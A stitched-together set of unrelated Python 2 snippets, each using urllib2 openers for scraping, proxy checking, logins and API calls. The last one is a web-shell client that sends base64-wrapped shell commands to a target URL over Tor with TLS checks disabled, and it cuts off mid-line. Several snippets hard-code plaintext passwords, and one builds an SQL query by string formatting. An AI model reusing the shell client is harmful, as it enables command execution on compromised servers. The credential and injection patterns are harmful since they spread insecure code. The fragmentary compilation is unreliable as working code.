def proxier(pip):
    try:
        testsite2 = "http://%s" % (testsite)
        proxy_handler = urllib2.ProxyHandler({'http': pip})
        opener = urllib2.build_opener(proxy_handler)
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        urllib2.install_opener(opener)
        req = urllib2.Request(testsite2)
        sock = urllib2.urlopen(req)
        connect = httplib.HTTPConnection(testsite)
        connect.request("HEAD", "/")
        r1 = connect.getresponse()
        if r1.reason == "OK":
            print "%s works - Added to %s" % (pip, filename)
            try:
                file = open(filename, 'a')
                file.write("%s" % (pip))
                file.close()
            except IOError:
                print "Could not append to file!"
    except urllib2.HTTPError as e:
        print 'Error code: ', e.code
        return e.code
    except Exception as detail:
        print "Error: Timeout"
        return False
def fetch_file(uri, file=None, username=None, password=None):
    """
    Fetch a file based on the URI provided.

    If you do not pass in a file pointer, a tempfile.NamedTemporaryFile is
    returned (or None if the file could not be retrieved).
    The URI can be either an HTTP url, or "s3://bucket_name/key_name"
    """
    boto.log.info('Fetching %s' % uri)
    if file == None:
        file = tempfile.NamedTemporaryFile()
    try:
        if uri.startswith('s3://'):
            bucket_name, key_name = uri[len('s3://'):].split('/', 1)
            c = boto.connect_s3(aws_access_key_id=username,
                                aws_secret_access_key=password)
            bucket = c.get_bucket(bucket_name)
            key = bucket.get_key(key_name)
            key.get_contents_to_file(file)
        else:
            if username and password:
                passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
                passman.add_password(None, uri, username, password)
                authhandler = urllib2.HTTPBasicAuthHandler(passman)
                opener = urllib2.build_opener(authhandler)
                urllib2.install_opener(opener)
            s = urllib2.urlopen(uri)
            file.write(s.read())
        file.seek(0)
    except:
        # Per the docstring, return None when the file could not be retrieved.
        boto.log.exception('Problem Retrieving file: %s' % uri)
        file = None
    return file
def run(self):
    try:
        cj = cookielib.LWPCookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        urllib2.install_opener(opener)
        req = urllib2.Request(self.url)
        operate = opener.open(req)
        html = operate.read()
        print r'handling ', self.urlid
        m = re.findall(r'>.*?</a></b></span>', html)
        if len(m) != 0:
            file_save = open(r'F://temp/3/' + self.urlid[:-1] + '.txt', 'a')
            file_save.write('ProductId:' + self.urlid)
            for i in m:
                j = i[1:-15].split('>')
                file_save.write(j[-1] + '\n')
            file_save.close()
        time.sleep(0.2)
    except:
        print "no"
def findMovieReviewers(movie_id, subUrl):
    print movie_id
    print subUrl
    reload(sys)
    sys.setdefaultencoding('utf-8')
    cj = cookielib.LWPCookieJar()
    try:
        cj.revert('douban.cookie')
    except:
        try:
            dou = douban()
            username = '******'
            password = '******'
            domain = 'http://www.douban.com/'
            origURL = 'http://www.douban.com/login'
            dou.setinfo(username, password, domain, origURL)
            dou.signin()
        except:
            return
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    collectPage = urllib2.urlopen("http://movie.douban.com/subject/" + movie_id + "/reviews" + subUrl,
                                  timeout=20).read().encode('utf-8')
    soup = BeautifulSoup(collectPage, 'html.parser')
    # init db connection
    conn = MySQLdb.connect(host='localhost', user='******', passwd='root')
    curs = conn.cursor()
    conn.select_db('pydb')
    reviewsOfThisPage = soup.findAll("a", {"class": "review-hd-avatar"})
    countReviews = len(reviewsOfThisPage)
    print countReviews
    for review in reviewsOfThisPage:
        reviewSoup = BeautifulSoup(str(review), 'html.parser')
        userId = reviewSoup.a["href"].split("/")[4]
        try:
            # insert data into db row by row
            curs.execute('INSERT INTO users (user_id) VALUES (%s)', userId)
            print "rows affected " + str(curs.rowcount)
        except:
            print "error inserting, probably duplicate for userid : " + userId
    try:
        foundSubUrl = soup.find("a", {"class": "next"})['href']
    except:
        foundSubUrl = ""
    print foundSubUrl
    conn.commit()
    curs.close()
    conn.close()
    if "" != foundSubUrl and countReviews > 0:
        time.sleep(2)
        findMovieReviewers(movie_id, foundSubUrl)
def save(self):
    # TODO: new IP address should be added in a side-by-side manner
    # or the interface wouldn't appear once IP was changed.
    retval = super(GlobalConfigurationForm, self).save()

    whattoreload = "hostname"
    if self.instance._orig_gc_ipv4gateway != self.cleaned_data.get('gc_ipv4gateway'):
        whattoreload = "networkgeneral"
    if self.instance._orig_gc_ipv6gateway != self.cleaned_data.get('gc_ipv6gateway'):
        whattoreload = "networkgeneral"
    notifier().reload(whattoreload)

    http_proxy = self.cleaned_data.get('gc_httpproxy')
    if http_proxy:
        os.environ['http_proxy'] = http_proxy
        os.environ['https_proxy'] = http_proxy
    elif not http_proxy:
        if 'http_proxy' in os.environ:
            del os.environ['http_proxy']
        if 'https_proxy' in os.environ:
            del os.environ['https_proxy']

    # Reset global opener so ProxyHandler can be recalculated
    urllib2.install_opener(None)

    return retval
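# A minimal standalone sketch (not from the original form class) of why
# install_opener(None) is used in save() above: urllib2 caches a single global
# OpenerDirector, and ProxyHandler only reads the proxy environment variables
# when an opener is built. Clearing the cached opener forces the next
# urllib2.urlopen() call to rebuild the default opener with the new settings.
# The proxy URL below is a placeholder.
import os
import urllib2

os.environ['http_proxy'] = 'http://proxy.example.com:3128'
urllib2.install_opener(None)  # drop any cached opener so the env change takes effect
# urllib2.urlopen('http://example.com/')  # would now be routed through the proxy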
def __init__(self, cookie_filename=None):
    self.cj = cookielib.LWPCookieJar()
    if cookie_filename is not None:
        self.cj.load(cookie_filename)
    self.cookie_processor = urllib2.HTTPCookieProcessor(self.cj)
    self.opener = urllib2.build_opener(self.cookie_processor, urllib2.HTTPHandler)
    urllib2.install_opener(self.opener)
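# A hedged usage sketch for a cookie-persisting client like the __init__ above.
# The class name "CookieClient" and the cookie file name are assumptions for
# illustration only; the original snippet does not show them.
import cookielib
import urllib2

class CookieClient(object):
    def __init__(self, cookie_filename=None):
        self.cj = cookielib.LWPCookieJar()
        if cookie_filename is not None:
            self.cj.load(cookie_filename)
        self.cookie_processor = urllib2.HTTPCookieProcessor(self.cj)
        self.opener = urllib2.build_opener(self.cookie_processor, urllib2.HTTPHandler)
        urllib2.install_opener(self.opener)

    def save_cookies(self, cookie_filename):
        # Persist the jar so a later run can pass the same file to __init__.
        self.cj.save(cookie_filename, ignore_discard=True)

# client = CookieClient()                      # start with an empty jar
# urllib2.urlopen('http://example.com/')       # cookies are captured globally
# client.save_cookies('cookies.lwp')           # reuse them on the next run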
def query(searchstr, outformat, allresults=False):
    """Return a list of bibtex items."""
    logging.debug("Query: %s" % searchstr)
    searchstr = "/scholar?q=" + urllib2.quote(searchstr)
    url = GOOGLE_SCHOLAR_URL + searchstr
    header = HEADERS
    header["Cookie"] = header["Cookie"] + ":CF=%d" % outformat

    for proxy_addr in proxy_list:
        try:
            proxy = urllib2.ProxyHandler({"http": proxy_addr})
            opener = urllib2.build_opener(proxy)
            urllib2.install_opener(opener)
            request = urllib2.Request(url, headers=header)
            response = urllib2.urlopen(request, timeout=5)
            print "Success HTTP-Agent:" + proxy_addr
            break
        except urllib2.URLError, e:
            if hasattr(e, "code"):
                print str(e.code) + e.msg + proxy_addr
                if e.code == 403 or e.code == 503:
                    proxy_list.remove(proxy_addr)
            elif e.reason.message == "timed out":
                print "Timed Out" + proxy_addr
                proxy_list.remove(proxy_addr)
            continue
def play_fourshared(url, name):
    global media_id
    xbmc.log("starting 4shared method with: %s and %s" % (name, url))
    username = '******'
    password = '******'
    cookie_file = os.path.join(__profilepath__, 'pktemp.cookies')
    media_file = os.path.join(__profilepath__, ("pktemp%d.mp3" % (media_id)))
    cj = cookielib.LWPCookieJar()
    media_id = media_id + 1
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    loginurl = 'https://www.4shared.com/login?login=%s&password=%s' % (username, password)
    xbmc.log("logging in to 4shared: " + loginurl)
    resp = opener.open(loginurl)
    cj.save(cookie_file, ignore_discard=True)
    cj.load(cookie_file, ignore_discard=True)
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    usock = opener.open(url)
    data = usock.read()
    # media_file = usock.geturl()
    usock.close()
    fp = open(media_file, 'wb')
    fp.write(data)
    fp.close()
    # play_stream(media_file, name)
    print "playing stream name: " + str(name) + " url: " + str(media_file)
    listitem = xbmcgui.ListItem(label=str(name), iconImage="DefaultVideo.png",
                                thumbnailImage=xbmc.getInfoImage("ListItem.Thumb"),
                                path=media_file)
    listitem.setInfo(type="Music", infoLabels={"Title": name})
    xbmc.Player(xbmc.PLAYER_CORE_DVDPLAYER).play(str(media_file), listitem)
def __init__(self, username, realm_id, config, debug=False):
    self._version = QAPI_VERSION
    self._cookiejar = CookieJar()
    self._username = username
    self._realm_id = realm_id
    self._profile = '@'.join((username, realm_id))
    self._realm = REALMS[self._realm_id]
    self._proxy = None
    self._templates = None
    self._debug = debug
    self._config = None  #. User configuration file for scripted mode
    self._connected = False
    self._username = '******'
    self._cFM = None
    try:
        from ConfigFileManager import ConfigFileManager, InternalConfigError
        try:
            self._config = ConfigFileManager(config)
            self._qapi_ini = self._config.option('qapi', 'ini')
            self._cFM = ConfigFileManager(self._qapi_ini)
        except InternalConfigError as e:
            raise Exception("Sorry, %s" % e)
    except ImportError as e:
        raise Exception("Sorry, %s" % e)
    urllib2.install_opener(self._opener())
def check_proxy(self, specific={}):
    """
    Checks if proxy settings are set on the OS.

    Returns:
        -- 1 when a direct connection works fine
        -- 2 when a direct connection fails and no proxy is set in the OS
           (one needs to be specified)
        -- 3 and the OS settings when a proxy is set in the OS

    see: https://docs.python.org/2/library/urllib.html#urllib.getproxies
    """
    os_proxies = getproxies()
    if len(os_proxies) == 0 and self.check_internet_connection:
        logging.info("No proxy needed nor set. Direct connection works.")
        return 1
    elif len(os_proxies) == 0 and not self.check_internet_connection:
        logging.error("Proxy not set in the OS. Needs to be specified")
        return 2
    else:
        env['http_proxy'] = os_proxies.get("http")
        env['https_proxy'] = os_proxies.get("https")

        proxy = ProxyHandler({
            'http': os_proxies.get("http"),
            'https': os_proxies.get("https")
        })
        opener = build_opener(proxy)
        install_opener(opener)
        urlopen('http://www.google.com')
        return 3, os_proxies
def openurl(self, url):
    """Open a web page and return its body."""
    cookie_support = urllib2.HTTPCookieProcessor(cookielib.CookieJar())
    self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
    urllib2.install_opener(self.opener)
    user_agents = [
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
        'Opera/9.25 (Windows NT 5.1; U; en)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
        'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',
        "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
        "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 ",
    ]
    agent = random.choice(user_agents)
    self.opener.addheaders = [
        ("User-agent", agent),
        ("Accept", "*/*"),
        ('Referer', 'http://www.google.com'),
    ]
    try:
        res = self.opener.open(url)
        return res.read()
    except:
        return None
def Weibo(USERID, PASSWD):
    client = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)
    referer_url = client.get_authorize_url()
    # print "referer url is : %s" % referer_url

    cookies = urllib2.HTTPCookieProcessor()
    opener = urllib2.build_opener(cookies)
    urllib2.install_opener(opener)

    postdata = {"client_id": APP_KEY,
                "redirect_uri": CALLBACK_URL,
                "userId": USERID,
                "passwd": PASSWD,
                "isLoginSina": "0",
                "action": "submit",
                "response_type": "code",
                }
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0",
               "Host": "api.weibo.com",
               "Referer": referer_url
               }
    req = urllib2.Request(url=AUTH_URL,
                          data=urllib.urlencode(postdata),
                          headers=headers)
    try:
        resp = urllib2.urlopen(req)
        # print "callback url is : %s" % resp.geturl()
        code = resp.geturl()[-32:]
    except APIError, e:
        print e
def _login(self):
    """
    Authenticates a user in a bugzilla tracker
    """
    if not (self.backend_user and self.backend_password):
        printdbg("No account data provided. Not logged in bugzilla")
        return

    import cookielib

    cookie_j = cookielib.CookieJar()
    cookie_h = urllib2.HTTPCookieProcessor(cookie_j)

    url = self._get_login_url(self.url)
    values = {'Bugzilla_login': self.backend_user,
              'Bugzilla_password': self.backend_password}

    opener = urllib2.build_opener(cookie_h)
    urllib2.install_opener(opener)
    data = urllib.urlencode(values)
    request = urllib2.Request(url, data)
    urllib2.urlopen(request)

    for i, c in enumerate(cookie_j):
        self.cookies[c.name] = c.value

    printout("Logged in bugzilla as %s" % self.backend_user)
    printdbg("Bugzilla session cookies: %s" % self.cookies)
def getResponseMixedData(self, url, secureToken, dic, additionalOptions=None):
    "Method sets up a REST call with mixed body data such as multipart/form-data."
    # check whether proxy is given
    if "proxy" in globals():
        proxy_handler = urllib2.ProxyHandler(self.config.proxy)
        opener = urllib2.build_opener(proxy_handler)
        urllib2.install_opener(opener)

    multipart = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
    urllib2.install_opener(multipart)

    req = urllib2.Request(url, dic.parameters())
    req.add_header('Authorization', self.config.SDK_AUTH + ",oauth_token=\"" + secureToken + "\"")
    req.add_header('User-Agent', self.config.SDK_VERSION)
    req.add_header('Accept', 'application/json')

    # sets additional header fields
    if additionalOptions != None:
        for key in additionalOptions:
            req.add_header(key, additionalOptions[key])

    try:
        response = urllib2.urlopen(req)
        response = json.loads(response.read())
        return response
    except urllib2.HTTPError as e:
        raise TelekomException(json.loads(e.read()))
def getResponseJSONData(self, url, secureToken, jsonString, additionalOptions=None):
    "Method sends a JSON encoded string via REST"
    if "proxy" in globals():
        # set proxy if necessary
        proxy_handler = urllib2.ProxyHandler(self.config.proxy)
        opener = urllib2.build_opener(proxy_handler)
        urllib2.install_opener(opener)

    req = urllib2.Request(url, jsonString)

    # define header fields
    req.add_header('Authorization', self.config.SDK_AUTH + ",oauth_token=\"" + secureToken + "\"")
    req.add_header('User-Agent', self.config.SDK_VERSION)
    req.add_header('Accept', 'application/json')
    req.add_header('Content-Type', 'application/json')
    # req.add_header('Content-Length', len(json))

    # establish call
    try:
        response = urllib2.urlopen(req)
        response = json.loads(response.read())
        return response
    except urllib2.HTTPError as e:
        # catch other status codes than '0000' and raise a new TelekomException
        # containing 'statusCode' and 'statusMessage'
        raise TelekomException(json.loads(e.read()))
def setCookie(self, account=''):
    self.cookieJarInMemory = cookielib.LWPCookieJar()
    if account == '':
        Var = self.cursor.execute(
            "select cookieStr, recordDate from LoginRecord order by recordDate desc").fetchone()
    else:
        # WHERE must come before ORDER BY
        Var = self.cursor.execute(
            "select cookieStr, recordDate from LoginRecord where account = `{}` order by recordDate desc".format(account)).fetchone()
    cookieStr = Var[0]
    self.loadCookJar(cookieStr)

    cookieStr = ''
    for cookie in self.cookieJarInMemory:
        cookieStr += cookie.name + '=' + cookie.value + ';'

    self.extraHeader = {
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0',
        'Referer': 'www.zhihu.com/',
        'Host': 'www.zhihu.com',
        'DNT': '1',
        'Connection': 'keep-alive',
        'Cache-Control': 'max-age=0',
        'Accept-Language': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
        # 'Accept-Encoding': 'gzip, deflate',  # seems to be unnecessary
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }

    self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookieJarInMemory))
    urllib2.install_opener(self.opener)
    return
def run(self):
    global proxyLists
    global proxyCheckedLists
    while proxyLists:
        proxyLock.acquire()            # acquire the lock
        proxyList = proxyLists.pop()   # pop one proxy entry
        proxyLock.release()

        cookie = urllib2.HTTPCookieProcessor()   # enable cookies
        proxyHandle = urllib2.ProxyHandler({"http": r"http://%s:%s" % (proxyList[0], proxyList[1])})
        opener = urllib2.build_opener(cookie, proxyHandle)
        opener.addheaders = [("User-Agent",
                              "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36")]
        urllib2.install_opener(opener)

        t1 = time.time()
        try:
            req = urllib2.urlopen(self.test_url, timeout=self.timeout)
            result = req.read()
            pos = result.find(self.test_str)
            timeused = time.time() - t1
            proxyList.append(timeused)
            if pos > 1:
                proxyLock.acquire()
                proxyCheckedLists.append(proxyList)
                proxyLock.release()
        except Exception, e:
            continue
def __init__(self, ticker_list, proxy=None):
    if proxy:
        proxy_support = urllib2.ProxyHandler(proxy)
        opener = urllib2.build_opener(proxy_support)
        urllib2.install_opener(opener)
    tickers = '%22%2C%22'.join(ticker_list).upper()
    url = 'http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20in%20(%22' + tickers + '%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback='
    req = urllib2.Request(url)
    try:
        response = urllib2.urlopen(req)
    except urllib2.URLError, e:
        if hasattr(e, 'reason'):
            print 'We failed to reach a server with reason:', e.reason
            print 'The URL passed was:', url
            print 'The tickers passed were:', tickers
            print 'The response from Yahoo was:', e.read()
            print
        elif hasattr(e, 'code'):
            print 'The server couldn\'t fulfill the request with error code:', e.code
            print 'The URL passed was:', url
            print 'The tickers passed were:', tickers
            print 'The response from Yahoo was:', e.read()
            print
def __init__(self):
    self.cj = cookielib.CookieJar()
    self.handlers = [poster.streaminghttp.StreamingHTTPHandler(),
                     poster.streaminghttp.StreamingHTTPRedirectHandler(),
                     urllib2.HTTPCookieProcessor(self.cj)]
    self.opener = urllib2.build_opener(*self.handlers)
    urllib2.install_opener(self.opener)
def urlcontent(self, url, para=None, header={}):
    """
    Fetch the source of a page.
    url     the address to fetch
    para    optional POST parameters
    header  request headers
    """
    print "start get url:%s" % url
    if self.auto_sleep:
        sleep_time = random.random() * 2
        time.sleep(sleep_time)

    # Configure the proxy (HTTP and HTTPS only)
    if self.proxy:
        opener = urllib2.build_opener(
            urllib2.ProxyHandler({'http': self.proxy, 'https': self.proxy}))
        urllib2.install_opener(opener)

    # Encode the POST parameters
    params = None
    if para:
        params = urllib.urlencode(para)

    # Build the request
    request = urllib2.Request(url, params, header)
    try:
        # Send the request
        response = urllib2.urlopen(request)
        content = response.read()
        # Re-encode if a charset was configured
        if self.charset:
            content = content.encode(self.charset)
        return content
    except:
        print 'get url content failed:', url
        return None
def loginWillowTV(url):
    try:
        print url
        opener = urllib2.build_opener(cookiejar)
        urllib2.install_opener(opener)
        email = wtv.getSetting('email')
        pwd = wtv.getSetting('password')
        values = {'Email': email, 'Password': pwd, 'KeepSigned': 'true', 'LoginFormSubmit': 'true'}
        headers = {'User-Agent': 'Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3'}
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data, headers)
        response = urllib2.urlopen(req)
        link = response.read()
        response.close()
        web = ''.join(link.splitlines()).replace('\t', '').replace('\'', '"')
        match = re.compile('Your email or password is incorrect').findall(web)
        if (len(match) > 0):
            d = xbmcgui.Dialog()
            d.ok('Login Failed', 'Error: Your email or password is incorrect.', 'Please verify your login details.')
            return False
        else:
            loginSuccess = True
            return True
    except:
        d = xbmcgui.Dialog()
        d.ok('LOGIN Failed', 'Its not your fault. BREAK TIME!', 'Please go out of Willow TV and try again.')
        return False
def fx_opener(request):
    request.addfinalizer(
        functools.partial(setattr, urllib2, '_opener', urllib2._opener)
    )
    opener = urllib2.build_opener(TestHTTPHandler)
    urllib2.install_opener(opener)
    return opener
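# A hedged sketch of a test consuming the fx_opener fixture above. It assumes
# pytest and that TestHTTPHandler (defined elsewhere in the suite) answers the
# request without touching the network; the URL is purely illustrative.
def test_uses_stub_opener(fx_opener):
    import urllib2
    response = urllib2.urlopen('http://stub.example.invalid/')  # handled by TestHTTPHandler
    assert response is not None
    # The fixture's finalizer restores the previously installed urllib2._opener.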
def _opener(self):
    build = [urllib2.HTTPHandler()]
    if self.request.redirect:
        build.append(urllib2.HTTPRedirectHandler())
    if self.request.proxy_host and self.request.proxy_port:
        build.append(urllib2.ProxyHandler(
            {self.request.proxy_protocol: self.request.proxy_host + ':' + str(self.request.proxy_port)}))
        if self.request.proxy_username:
            proxy_auth_handler = urllib2.ProxyBasicAuthHandler()
            proxy_auth_handler.add_password('realm', 'uri',
                                            self.request.proxy_username,
                                            self.request.proxy_password)
            build.append(proxy_auth_handler)
    if self.request.cookies:
        self.request.cookies = os.path.join(self._dirname, self.request.cookies)
        self.cookies = cookielib.MozillaCookieJar()
        if os.path.isfile(self.request.cookies):
            self.cookies.load(self.request.cookies)
        build.append(urllib2.HTTPCookieProcessor(self.cookies))
    urllib2.install_opener(urllib2.build_opener(*build))
def fetch_data_from_url(url):
    """Downloads and returns data from a url"""
    request = urllib2.Request(url)
    opener = urllib2.build_opener()
    urllib2.install_opener(opener)
    data = opener.open(request).read()
    return data
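# Note on fetch_data_from_url() above: the data is read through opener.open(),
# so the install_opener() call only affects later urllib2.urlopen() calls. A
# small sketch of that distinction (the URL is a placeholder):
import urllib2

opener = urllib2.build_opener()      # a private OpenerDirector
urllib2.install_opener(opener)       # also make it the process-wide default
# via_opener = opener.open('http://example.com/').read()      # explicit opener
# via_global = urllib2.urlopen('http://example.com/').read()  # installed opener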
def _connect(self, request):
    """ Connect to the secured database by opening the request.

    Required:
    urllib2.Request request     The URL Request.

    Return:
    str serialized_response    response data

    """
    # create a password manager
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()

    # Add the username and password.
    # If we knew the realm, we could use it instead of None.
    password_mgr.add_password(
        None,
        self.base_url(),
        self._username,
        self._password)

    handler = urllib2.HTTPBasicAuthHandler(password_mgr)

    # create "opener" (OpenerDirector instance)
    opener = urllib2.build_opener(handler)

    # Install the opener.
    # Now all calls to urllib2.urlopen use our opener.
    urllib2.install_opener(opener)

    serialized_response = urllib2.urlopen(request).read()

    return serialized_response
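# A self-contained sketch of the same basic-auth pattern used by _connect()
# above. The URL and credentials are placeholders, not values from the
# original class.
import urllib2

def open_with_basic_auth(url, username, password):
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    # Realm None lets the handler answer a challenge for any realm at this URL.
    password_mgr.add_password(None, url, username, password)
    opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(password_mgr))
    urllib2.install_opener(opener)  # later urllib2.urlopen() calls reuse the handler
    return urllib2.urlopen(url).read()

# body = open_with_basic_auth('http://localhost:5984/mydb', 'admin', 'secret')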
def login_website():
    '''51cto'''
    proxy_support = urllib2.ProxyHandler({'http': '127.0.0.1:8086'})
    cook_jar = cookielib.CookieJar()
    cookie_support = urllib2.HTTPCookieProcessor(cook_jar)
    opener = urllib2.build_opener(proxy_support, cookie_support, urllib2.HTTPHandler)
    urllib2.install_opener(opener)
    print 'logging'
    login_url = 'http://home.51cto.com/index.php?s=/Index/doLogin'
    user_agents = ['Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1', ]
    post_data = urllib.urlencode({'email': '*****@*****.**',
                                  'passwd': '123456a',
                                  'autologin': '******',
                                  'reback': 'http%3A%2F%2Fwww.51cto.com%2F',
                                  'button.x': 36,
                                  'button.y': 17,
                                  })
    headers = {
        'User-Agent': user_agents[0],
        'Referer': 'http://home.51cto.com/index.php?s=/Index/index/reback/http%253A%252F%252Fwww.51cto.com%252F/'
    }
    req = urllib2.Request(url=login_url, data=post_data, headers=headers)
    res = urllib2.urlopen(req)
    print 'code is :' + str(res.code)
    if res.code <= 200:
        print 'login success'
    else:
        print 'login fail'
    print cook_jar._cookies
    login_after_action(res)
    return res
def login_website():
    '''csdn'''
    cook_jar = cookielib.CookieJar()
    cookie_support = urllib2.HTTPCookieProcessor(cook_jar)
    opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
    urllib2.install_opener(opener)
    print 'logging'
    login_url = 'http://passport.csdn.net/ajax/accounthandler.ashx?t=log&u=dylinshi&p=123456a&remember=0&f=http%3A%2F%2Fblog.csdn.net%2F&rand=0.363029723724382'
    user_agents = [
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6',
        'Opera/9.25 (Windows NT 5.1; U; en)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
        'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9'
    ]
    headers = {
        'User-Agent': user_agents[0],
        'Referer': settings.S_start_urls[0]
    }
    req = urllib2.Request(url=login_url, headers=headers)
    res = urllib2.urlopen(req)
    print 'code is :' + str(res.code)
    if res.code <= 200:
        print 'login %s success' % settings.S_target_website
    else:
        print 'login %s fail' % settings.S_target_website
    print cook_jar._cookies
    return res
def __init__(self, login, password, hostname, port=8091):
    self.passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
    self.passman.add_password(None, "http://%s:%d/" % (hostname, int(port)), login, password)
    self.hostname = hostname
    self.port = port
    self.opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(self.passman))
    urllib2.install_opener(self.opener)
def get_current_sequence(self):
    """get the current sequence from the playlist"""
    url = self.get_sequence_url()
    header = self.get_header()
    req = urllib2.Request(url, None, header)
    opener = urllib2.build_opener()
    opener.add_handler(urllib2.HTTPCookieProcessor(self.get_cookie()))
    try:
        opener.add_handler(self.get_proxy())
    except:
        log.warning('can not add proxy')
    urllib2.install_opener(opener)
    try:
        response = urllib2.urlopen(req, timeout=10)
        stream = response.read()
    except:
        return 0
    try:
        for line in stream.split('\n'):
            if line.startswith('#EXT-X-MEDIA-SEQUENCE'):
                return line.split(':')[1]
    except:
        return 0
def __init__(self, url, close=True, proxy=None, post=None, mobile=False, referer=None,
             cookie=None, output='', timeout='10'):
    if not proxy is None:
        proxy_handler = urllib2.ProxyHandler({'http': '%s' % (proxy)})
        opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
        opener = urllib2.install_opener(opener)

    if output == 'cookie' or not close == True:
        import cookielib
        cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
        opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
        opener = urllib2.install_opener(opener)

    if not post is None:
        request = urllib2.Request(url, post)
    else:
        request = urllib2.Request(url, None)

    if mobile == True:
        request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
    else:
        request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')

    if not referer is None:
        request.add_header('Referer', referer)
    if not cookie is None:
        request.add_header('cookie', cookie)

    response = urllib2.urlopen(request, timeout=int(timeout))

    if output == 'cookie':
        result = str(response.headers.get('Set-Cookie'))
    elif output == 'geturl':
        result = response.geturl()
    else:
        result = response.read()

    if close == True:
        response.close()

    self.result = result
def get_page_source(self, cmd): self.cmd = cmd if self.shouldIuseB64: self.cmd = "echo %s | base64 -d | sh" % self.cmd.encode( 'base64').replace('\n', '') result = re.search(';sudo ', self.cmd) if result: command = self.cmd.replace( 'sudo', '{0}sudo{1}'.format('\033[91m', '\033[93m')) errmsg = colored( '\n[!] Warning this command ({0}) could break the connection. I\'m not going to allow it to be sent' .format(command), 'red') cprint(errmsg, 'red') elif getargs.url: try: _create_unverified_https_context = ssl._create_unverified_context except AttributeError: # Legacy Python that doesn't verify HTTPS certificates by default pass else: # Handle target environment that doesn't support HTTPS verification ssl._create_default_https_context = _create_unverified_https_context # Proxy support proxy_support = ProxyHandler( {'http': self.proxy} if self.proxy else {}) opener = build_opener(proxy_support, HTTPHandler(debuglevel=0)) opener.addheaders = [ ('Accept', '*/*'), ] if getargs.headers: # print opener.addheaders # print getargs.headers opener.addheaders.extend(getargs.headers) # Tor support if self.tor: opener = build_opener( SocksiPyHandler(PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)) # print opener.open('http://ifconfig.me/ip').read() # exit() # User angent if getargs.random_agent: opener.addheaders.extend([('User-agent', self.random_agent)]) elif self.user_agent: opener.addheaders.extend([('User-agent', self.user_agent)]) else: pass install_opener(opener) errmsg = colored( '\n[!] Check your network connection and/or the proxy (if you\'re using one)', 'red') # Check if the method is POST if self.method == 'post' or (self.parameter and self.method != 'cookie'): self.method = 'post' parameters = urlencode({ self.parameter: 'echo ::command_start::;' + self.cmd.strip(';') + ';echo ::command_end::;' }) try: sc = map(str.rstrip, opener.open(self.url, parameters).readlines()) sc = '::command_deli::'.join(sc) sc = re.search('::command_start::(.*?)::command_end::', sc) if sc: sc = 